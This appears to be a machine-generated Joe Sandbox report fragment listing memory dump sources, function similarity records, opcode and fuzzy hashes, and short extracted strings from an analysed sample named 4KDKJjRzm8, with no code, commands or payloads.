                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                        • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                        • Opcode ID: 547666e6703dae618f8d6e4c32f7ee6ac85d45aad480c6a6cdd9aa96bbd55f5e
                                                                                                                                                                                                                                                        • Instruction ID: 135122effed4f7d9b228a71cb729eda4a697b7a4acf6b4fa828b6784302cd929
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 547666e6703dae618f8d6e4c32f7ee6ac85d45aad480c6a6cdd9aa96bbd55f5e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1322EE7191C341CFD3249F29D880B2FBBE5BF8A310F194A6CE999572A1D735D901CB92
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009A84BD
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009A85B4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                        • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                        • Opcode ID: d7feb143a88352cbb4b6c8e7e202f3a2d2377527024626037b71db3029b42e04
                                                                                                                                                                                                                                                        • Instruction ID: 9c699d5cca753d03f4428af0e175697fe94790ac39059ee3c87fa99bcf730f9e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7feb143a88352cbb4b6c8e7e202f3a2d2377527024626037b71db3029b42e04
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3012EF7191C381CFD3248F29D880B2BBBE5BF8A310F194A6CE999573A1D735D901CB92
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                                                                                                                                                        • API String ID: 0-1171452581
                                                                                                                                                                                                                                                        • Opcode ID: a38d7c6a4ffb17668dd2c6db5b103efe2396ee8ee99fca49b658d7d96f1a0e4b
                                                                                                                                                                                                                                                        • Instruction ID: 71a21d2318069933a7138a1be246c31ef65474d107b645198e8d00092071c230
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a38d7c6a4ffb17668dd2c6db5b103efe2396ee8ee99fca49b658d7d96f1a0e4b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC91F3B1A083009BD714DF68C891B67B7F5EFD6718F14882CF9898B291E375E905C792
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                                                                                                                                                        • API String ID: 0-3257051659
                                                                                                                                                                                                                                                        • Opcode ID: a3908bd244e20bf81f41994a852738dcb60314724f913b0ea52fa307733f409c
                                                                                                                                                                                                                                                        • Instruction ID: 95936c29af75d99a1c2c29baf9cf86693c739e4a579a68844de82d1584c9cc4b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3908bd244e20bf81f41994a852738dcb60314724f913b0ea52fa307733f409c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5A14A72A183508BD714CF28C85276FB7D6FBC5318F598A3DE485D7391DA3889068782
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: EXCm$EXCm$_^]\$_^]\
                                                                                                                                                                                                                                                        • API String ID: 0-1657758763
                                                                                                                                                                                                                                                        • Opcode ID: 16687e0ef3703f012825ac5fac606f348e5e5af15fdd549bbdf9ffe239a82646
                                                                                                                                                                                                                                                        • Instruction ID: 29422a951d2db06500259efd7201425533ad1bf77e64b43644522163d385294a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16687e0ef3703f012825ac5fac606f348e5e5af15fdd549bbdf9ffe239a82646
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51C2B02086928BD725CF3981A0B73BBD2AF57304F1DC5ACC4D78F652DA34A985DB90
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: VN$VN$i$i
                                                                                                                                                                                                                                                        • API String ID: 0-1885346908
                                                                                                                                                                                                                                                        • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                        • Instruction ID: ecb26594a541cad9d8b2b3dc3facff78857fd034a00c133f8f24de2d91806da7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B421C62154C3818BD3058E6580402AABBE7ABC7728F28565EE0F15B391E73BC909879B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: /.7&$1o>7$1o>7
                                                                                                                                                                                                                                                        • API String ID: 0-1551524074
                                                                                                                                                                                                                                                        • Opcode ID: e32ca018c1d1e48539f9b4042b8de3918717f8bcb859af44bf6b4a69ef5d2a4f
                                                                                                                                                                                                                                                        • Instruction ID: 58967129216884e0a6e0261b56af09305a82af7c0755e25e439153b430dae36e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e32ca018c1d1e48539f9b4042b8de3918717f8bcb859af44bf6b4a69ef5d2a4f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B02E2F3E146244BF3044E29DD89366B692EB94320F2F823C9E9CA77C5E97E9C054785
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .txt$<\hX$_^]\
                                                                                                                                                                                                                                                        • API String ID: 0-3117400391
                                                                                                                                                                                                                                                        • Opcode ID: c6ff343875e3d5ad465a184c8d300b0e666945904efa3e64a60fc2295ede424b
                                                                                                                                                                                                                                                        • Instruction ID: b2f19b907f14e7a331a555c277caaf89d37382e9eea7e938e7fa11635dfb56f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6ff343875e3d5ad465a184c8d300b0e666945904efa3e64a60fc2295ede424b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88C10F7190C381DFD7049F28D881A2ABBE2AFC6310F188A6CF4E5473A2D739D945DB52
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Xykw$j,}7
                                                                                                                                                                                                                                                        • API String ID: 0-1890311054
                                                                                                                                                                                                                                                        • Opcode ID: f4ec67cf8b928efbfb8d95b4b51e676cb4a6bed884ddc9fdd77e5f665be48e15
                                                                                                                                                                                                                                                        • Instruction ID: a6b0201c276232dd1e00f2b5acf91818619fee10dca13ab38b876a8867f323d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4ec67cf8b928efbfb8d95b4b51e676cb4a6bed884ddc9fdd77e5f665be48e15
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC12D2B3F106204BF3504D38DC983A6B692EBD4320F2B863C9E88AB7C5D97E5D094785
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: a,l$a,l
                                                                                                                                                                                                                                                        • API String ID: 0-2641350779
                                                                                                                                                                                                                                                        • Opcode ID: bd40fbdabceae6b7fccbded4e7e3480c96242527b155082f8e716d268f39406c
                                                                                                                                                                                                                                                        • Instruction ID: 5f764ba102b3b2eff7a43298bff746a39978f3cd880bf2f5ed8112c02029074e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd40fbdabceae6b7fccbded4e7e3480c96242527b155082f8e716d268f39406c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9F101B3F056148BF3184E29CC94366B692DBD4720F2F823D9E98A77C4E93E6D094785
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: b@~$d~[w
                                                                                                                                                                                                                                                        • API String ID: 0-772971935
                                                                                                                                                                                                                                                        • Opcode ID: b10fe13c46e2b701ecce6e6e2ea33deb759efcc85d8a70285b647e489e2ce0ec
                                                                                                                                                                                                                                                        • Instruction ID: 268c66e425ed35882baff6c15243d6250ea2d2730e59b0190b35ffa55acd32f1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b10fe13c46e2b701ecce6e6e2ea33deb759efcc85d8a70285b647e489e2ce0ec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6E1E4B3E146104BF3549E39CC983667AD2DBD4320F2A863CDE889B7C9D97E5D098781
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: C@$_^]\
                                                                                                                                                                                                                                                        • API String ID: 0-1259475386
                                                                                                                                                                                                                                                        • Opcode ID: 79e20e1510f9a779db702381f58fe648fcdb50ab5cdd1cdafaefedf8779cb2ef
                                                                                                                                                                                                                                                        • Instruction ID: 66b27a0a8bc4afb7c139ad2ef3a79e86160e08c32ff682918b2661c26f9e2fa2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79e20e1510f9a779db702381f58fe648fcdb50ab5cdd1cdafaefedf8779cb2ef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAB1F7B1A093109BD714DB29C85277BB3F5EFD6324F19892CF89697782E338D9058392
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: )$IEND
                                                                                                                                                                                                                                                        • API String ID: 0-707183367
                                                                                                                                                                                                                                                        • Opcode ID: e24443cc1dab415447a0ea973f440dcf53aeb84a36c7b1ba7dd8f14a70c6be10
                                                                                                                                                                                                                                                        • Instruction ID: bef19b16c861cb2ccf8d77fb3815e45493df20b321cd93bc13a75d2f3874f861
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e24443cc1dab415447a0ea973f440dcf53aeb84a36c7b1ba7dd8f14a70c6be10
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6D1BEB1908345DFD720EF18D845B5EBBE4AF94308F14492DF9999B382E375E908CB92
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: _r>
                                                                                                                                                                                                                                                        • API String ID: 0-2992733919
                                                                                                                                                                                                                                                        • Opcode ID: bc0a199052c705d5fbbda7b7bc739b84525746cde22b07cb45f02a5ac0672950
                                                                                                                                                                                                                                                        • Instruction ID: d2348f07728230aa41ca7562b59bebc579263d57e27e3a28d8cb4b373ce6ee87
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc0a199052c705d5fbbda7b7bc739b84525746cde22b07cb45f02a5ac0672950
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E02EEF3E156104BF3444929DC99366B693EBD4320F2F863DDA88AB7C5E93E9C058784
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: IBr}
                                                                                                                                                                                                                                                        • API String ID: 0-2281408496
                                                                                                                                                                                                                                                        • Opcode ID: 3ebf104dd50db52582a927b5d7f292f9b44523ea1d04c1ef59fd4d4caf5d54cf
                                                                                                                                                                                                                                                        • Instruction ID: 1bcfd0fe37236c8e2bfa832f233cf143a850ae527352676a2f2a0e3bd73f1660
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ebf104dd50db52582a927b5d7f292f9b44523ea1d04c1ef59fd4d4caf5d54cf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1102D0F3E156214BF3545E28DC88366B692EBD0320F2F453D8B88AB7C4E97E5C068785
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 5|S
                                                                                                                                                                                                                                                        • API String ID: 0-977273483
                                                                                                                                                                                                                                                        • Opcode ID: 39fc0bc2c34ed9ee22231ba974fe665938a53a6edcc168e39ab95e585e216da1
                                                                                                                                                                                                                                                        • Instruction ID: a39b9dd13d70c38fffa26e8b6e4f7285d422382fde5a6074036e53deb0761cce
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39fc0bc2c34ed9ee22231ba974fe665938a53a6edcc168e39ab95e585e216da1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8202E0B3F156104BF3444E39DC98366B693EBD4320F2B863C8A989B7C9ED3E58094785
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,rw
                                                                                                                                                                                                                                                        • API String ID: 0-3378528537
                                                                                                                                                                                                                                                        • Opcode ID: 53fbd2e7458eed50e3b9917dfa14c90bf8dc509c01c3bfa035abddd8a4e231e4
                                                                                                                                                                                                                                                        • Instruction ID: 684c97a4e1522d29ccd5b232a4a2129b0d2e5727e4aabc4be9c939bdc055cab8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53fbd2e7458eed50e3b9917dfa14c90bf8dc509c01c3bfa035abddd8a4e231e4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F1ABB3F116144BF3585929DC993667283EBD4324F2F823C9B98AB7C5E97EAC054284
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: hs?
                                                                                                                                                                                                                                                        • API String ID: 0-1275372288
                                                                                                                                                                                                                                                        • Opcode ID: d32c9e62f08d7766fafa53697adf59a33a89c7a3d0e0bcffe2f93abeecef1479
                                                                                                                                                                                                                                                        • Instruction ID: b592b81cf46a3bc332317270d4315cb837736dc86d88d0e9040b1ccf3e1a9e62
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d32c9e62f08d7766fafa53697adf59a33a89c7a3d0e0bcffe2f93abeecef1479
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5F1ACF3E046104BF3549E29DC94366B6D2EBD4320F2B853CDA88A77C8E93E5C468785
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ^tK_
                                                                                                                                                                                                                                                        • API String ID: 0-2973220266
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: %euu
                                                                                                                                                                                                                                                        • API String ID: 0-2324922843
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                        • API String ID: 0-2657877971
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: V-d
                                                                                                                                                                                                                                                        • API String ID: 0-603182694
                                                                                                                                                                                                                                                        • Opcode ID: dd12917aa5202c3f96ad76a6b71ce7a7325de34e2714ae8ff20f912a464f1d81
                                                                                                                                                                                                                                                        • Instruction ID: 4b41eeef598208f8b0eab7173f826c602b77f7c151a904bc1df2e9df4922493e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd12917aa5202c3f96ad76a6b71ce7a7325de34e2714ae8ff20f912a464f1d81
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FA1AEB3F106254BF3504D79CC983626683DBD5321F2F82788E58AB7C9E97E8D0A5384
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Z1\3
                                                                                                                                                                                                                                                        • API String ID: 0-159632435
                                                                                                                                                                                                                                                        • Opcode ID: d4d6ec3f760f3a31e7ecba1035f325aa458cf538bbfa09db5630b80a7cf354d9
                                                                                                                                                                                                                                                        • Instruction ID: 79c8c6466dec276bc7513e01b511644a6eb9f835a6a1b2e1931f7497fc9b3f74
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4d6ec3f760f3a31e7ecba1035f325aa458cf538bbfa09db5630b80a7cf354d9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD8145B26083508BD304DF25C85136BBBE2FFD6314F188A2DE4D68B385EB789905C782
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: &"-D
                                                                                                                                                                                                                                                        • API String ID: 0-3461308950
                                                                                                                                                                                                                                                        • Opcode ID: 19e85fa2ac0b4556aaa079c977067a890cad906a24d68318ad5d4ac690e8a8bc
                                                                                                                                                                                                                                                        • Instruction ID: 8a6fd3afac3570761ad385a72ec93fd511015fc1cda0a0fca5d38ed830247b60
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19e85fa2ac0b4556aaa079c977067a890cad906a24d68318ad5d4ac690e8a8bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2918BB3F1012547F3944D78CC683A2A683DB91325F2F827C8E89ABBC9D93E5D095784
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: NO
                                                                                                                                                                                                                                                        • API String ID: 0-3376426101
                                                                                                                                                                                                                                                        • Opcode ID: 46f8ed6725fb268da0d1a7d4fb0cf23ff7d61b94d5dd9527c252e2c9965bc53a
                                                                                                                                                                                                                                                        • Instruction ID: 1df37f764e1fe70e76575363d722fb4ec1526a257d2e006d8250b1faff30644a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46f8ed6725fb268da0d1a7d4fb0cf23ff7d61b94d5dd9527c252e2c9965bc53a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7161FEB161C3018BD318DF65C892A6BB3F2EFD5314F09C96CE0D58B784E6388A05CB66
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
